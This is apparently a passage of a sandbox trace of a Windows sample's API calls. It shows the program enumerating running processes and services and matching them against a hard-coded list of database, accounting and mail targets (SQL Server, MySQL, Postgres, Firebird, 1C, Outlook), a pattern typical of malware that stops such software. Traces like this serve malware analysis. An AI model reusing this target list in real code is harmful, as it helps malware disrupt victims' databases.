(lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0271.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0271.027] lstrlenW (lpString="RpcSs") returned 5 [0271.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0271.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0271.027] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0271.027] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0271.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0271.027] lstrlenW (lpString="SamSs") returned 5 [0271.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0271.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0271.028] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0271.028] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0271.028] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0271.028] lstrlenW (lpString="Schedule") returned 8 [0271.028] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0271.028] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0271.028] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0271.028] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0271.028] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0271.028] lstrlenW (lpString="SENS") returned 4 [0271.028] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0271.028] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0271.028] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0271.028] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0271.028] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0271.028] lstrlenW (lpString="ShellHWDetection") returned 16 [0271.028] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0271.028] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0271.028] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0271.028] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0271.028] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0271.028] lstrlenW (lpString="Spooler") returned 7 [0271.028] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0271.028] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0271.028] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0271.028] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0271.028] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0271.028] lstrlenW (lpString="Themes") returned 6 [0271.028] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0271.029] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0271.029] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0271.029] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0271.029] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0271.029] lstrlenW (lpString="UxSms") returned 5 [0271.029] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0271.029] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0271.029] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0271.029] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0271.029] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0271.029] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4262fb8 | out: hHeap=0x4a0000) returned 1 [0271.029] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x384 [0271.030] Process32FirstW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.031] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0271.031] lstrlenW (lpString="System") returned 6 [0271.031] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0271.031] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0271.031] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0271.031] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0271.031] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0271.031] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0271.031] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0271.031] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0271.031] lstrlenW (lpString="smss.exe") returned 8 [0271.031] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0271.031] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0271.032] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0271.032] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0271.032] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0271.032] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0271.032] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0271.032] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0271.032] lstrlenW (lpString="csrss.exe") returned 9 [0271.032] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0271.032] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0271.032] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0271.032] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0271.032] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0271.032] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0271.032] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0271.032] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0271.032] lstrlenW (lpString="wininit.exe") returned 11 [0271.033] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0271.033] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0271.033] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0271.033] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0271.033] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0271.033] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0271.033] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0271.033] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0271.033] lstrlenW (lpString="csrss.exe") returned 9 [0271.033] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0271.033] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0271.033] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0271.033] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0271.033] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0271.033] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0271.033] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0271.033] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0271.034] lstrlenW (lpString="winlogon.exe") returned 12 [0271.034] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0271.034] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0271.034] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0271.034] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0271.034] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0271.034] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0271.034] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0271.034] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0271.034] lstrlenW (lpString="services.exe") returned 12 [0271.034] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0271.034] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0271.034] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0271.034] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0271.034] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0271.034] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0271.034] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0271.034] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0271.035] lstrlenW (lpString="lsass.exe") returned 9 [0271.035] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0271.035] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0271.035] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0271.035] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0271.035] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0271.035] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0271.035] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0271.035] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0271.036] lstrlenW (lpString="lsm.exe") returned 7 [0271.036] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0271.036] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0271.036] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0271.036] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0271.036] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0271.036] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0271.036] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0271.036] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.036] lstrlenW (lpString="svchost.exe") returned 11 [0271.036] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.036] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.036] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.036] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0271.036] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0271.036] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0271.036] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0271.036] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.037] lstrlenW (lpString="svchost.exe") returned 11 [0271.037] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.037] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.037] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.037] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0271.037] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0271.037] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0271.037] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0271.037] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.037] lstrlenW (lpString="svchost.exe") returned 11 [0271.037] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.037] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.037] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.037] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0271.037] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0271.038] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0271.038] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0271.038] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.038] lstrlenW (lpString="svchost.exe") returned 11 [0271.038] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.038] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.038] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.038] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0271.038] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0271.038] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0271.038] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0271.038] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.039] lstrlenW (lpString="svchost.exe") returned 11 [0271.039] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.039] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.039] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.039] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0271.039] lstrlenW (lpString="audiodg.exe") returned 11 [0271.039] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.039] lstrlenW (lpString="svchost.exe") returned 11 [0271.040] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0271.040] lstrlenW (lpString="userinit.exe") returned 12 [0271.040] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0271.040] lstrlenW (lpString="explorer.exe") returned 12 [0271.040] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0271.040] lstrlenW (lpString="dwm.exe") returned 7 [0271.040] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.041] lstrlenW (lpString="svchost.exe") returned 11 [0271.041] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0271.041] lstrlenW (lpString="agent1c.exe") returned 11 [0271.041] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0271.041] lstrlenW (lpString="spoolsv.exe") returned 11 [0271.041] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0271.042] lstrlenW (lpString="reader_sl.exe") returned 13 [0271.042] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0271.042] lstrlenW (lpString="dllhost.exe") returned 11 [0271.042] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0271.042] lstrlenW (lpString="taskhost.exe") returned 12 [0271.042] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.043] lstrlenW (lpString="svchost.exe") returned 11 [0271.043] Process32NextW (in: hSnapshot=0x384, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0271.043] CloseHandle (hObject=0x384) returned 1 [0271.043] Sleep (dwMilliseconds=0x1f4) [0271.602] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x42dc6a0 [0271.605] EnumServicesStatusExW (in: hSCManager=0x42dc6a0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 0 [0271.605] GetLastError () returned 0xea [0271.605] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc9a) returned 0x4262fb8 [0271.605] EnumServicesStatusExW (in: hSCManager=0x42dc6a0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4262fb8, cbBufSize=0xc9a, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4262fb8, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 1 [0271.605] CloseServiceHandle (hSCObject=0x42dc6a0) returned 1 [0271.606] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0271.606] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0271.606] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0271.606] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0271.606] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0271.606] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0271.606] lstrlenW (lpString="AudioSrv") returned 8 [0271.606] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0271.606] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0271.606] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0271.606] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0271.606] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0271.606] lstrlenW (lpString="BFE") returned 3 [0271.606] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0271.606] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0271.606] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0271.606] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0271.606] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0271.607] lstrlenW (lpString="CryptSvc") returned 8 [0271.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0271.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0271.607] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0271.607] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0271.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0271.607] lstrlenW (lpString="CscService") returned 10 [0271.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0271.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0271.607] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0271.607] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0271.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0271.607] lstrlenW (lpString="DcomLaunch") returned 10 [0271.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0271.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0271.607] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0271.607] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0271.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0271.607] lstrlenW (lpString="Dhcp") returned 4 [0271.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0271.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0271.607] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0271.607] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0271.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0271.607] lstrlenW (lpString="Dnscache") returned 8 [0271.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0271.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0271.607] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0271.607] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0271.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") 